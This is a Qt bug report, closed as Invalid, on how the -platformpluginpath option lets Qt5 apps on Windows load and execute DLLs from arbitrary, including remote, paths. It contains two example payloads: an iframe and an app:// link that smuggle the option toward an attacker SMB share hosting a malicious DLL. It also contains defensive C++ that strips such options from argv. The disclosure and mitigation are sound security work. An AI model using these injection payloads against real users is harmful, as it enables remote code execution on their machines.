Details
- Bug
- Resolution: Invalid
- P2: Important
- None
- 5.11
- Windows
Description
The Qt5 application, depending on certain metadata, will automatically execute the plugins pointed to by platformpluginpath as soon as they are loaded in memory.
For example,
myTest.exe -platformpluginpath C:/Path-of-library/specific
will load and execute all DLLs in the C:/Path-of-library/specific/imageformats directory.
<iframe src='myTest;?" - platformpluginpath \\192.162.x.y\share "'>
Now this remote “share” contains an “imageformats” directory that holds a “malicious.dll” file. Since Qt loads plugins based on the metadata, the DLL name does not matter.
Another scenario:
If a user registers a custom URL scheme for an application in Windows, e.g. app://, and has this application installed and the URL scheme registered:
Create a webpage with a link to 'app://? "-platformpluginpath \\SERVER\SharedFolder\"'.
When the user opens such a page on his PC and clicks this link, your application is started on his machine and the platform plugin is loaded from the shared folder. This platform plugin can be qwindows.dll with injected code.
There are two nicely detailed articles about this potentially dangerous situation:
https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739
https://www.bleepingcomputer.com/news/security/qt5-based-gui-apps-susceptible-to-remote-code-execution/
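One application-side mitigation for the URL-handler scenario above is to drop plugin-loading options from argv before the Qt application object parses them. This is an added example, not code from the report or from Qt; the function names and the sample argv are hypothetical, and `-platform` and `-plugin` are included as further QGuiApplication options beyond the `-platformpluginpath` named in the report.

```cpp
#include <cstddef>
#include <cstdio>
#include <string>
#include <vector>

// Options that make Qt load plugin code. Only -platformpluginpath is named in
// the report; -platform and -plugin are further QGuiApplication options.
static const char* const kPluginOptions[] = {
    "-platformpluginpath", "-platform", "-plugin"};

// Qt accepts "--option" as well as "-option", so normalise before comparing.
static std::string normalise(const std::string& arg) {
    return arg.rfind("--", 0) == 0 ? arg.substr(1) : arg;
}

static bool is_plugin_option(const std::string& arg) {
    const std::string n = normalise(arg);
    for (const char* opt : kPluginOptions)
        if (n == opt) return true;
    return false;
}

// Returns a copy of args with each plugin option and its value removed.
// The dropped option names are appended to `rejected` so they can be logged.
std::vector<std::string> strip_plugin_options(
        const std::vector<std::string>& args,
        std::vector<std::string>& rejected) {
    std::vector<std::string> kept;
    for (std::size_t i = 0; i < args.size(); ++i) {
        if (i > 0 && is_plugin_option(args[i])) {  // args[0] is the program name
            rejected.push_back(args[i]);
            if (i + 1 < args.size()) ++i;          // skip the option's value too
            continue;
        }
        kept.push_back(args[i]);
    }
    return kept;
}

int main() {
    // Constructed argv, shaped like a URL-handler launch with an injected option.
    std::vector<std::string> args = {
        "myTest.exe", "app://?", "-platformpluginpath", "\\\\SERVER\\SharedFolder\\"};
    std::vector<std::string> rejected;
    std::vector<std::string> kept = strip_plugin_options(args, rejected);
    std::printf("kept %zu args, rejected %zu\n", kept.size(), rejected.size());
    return 0;
}
```

The filtered vector is what would be rebuilt into the argc/argv pair handed to the application object; a non-empty `rejected` list on a URL-handler launch is worth logging.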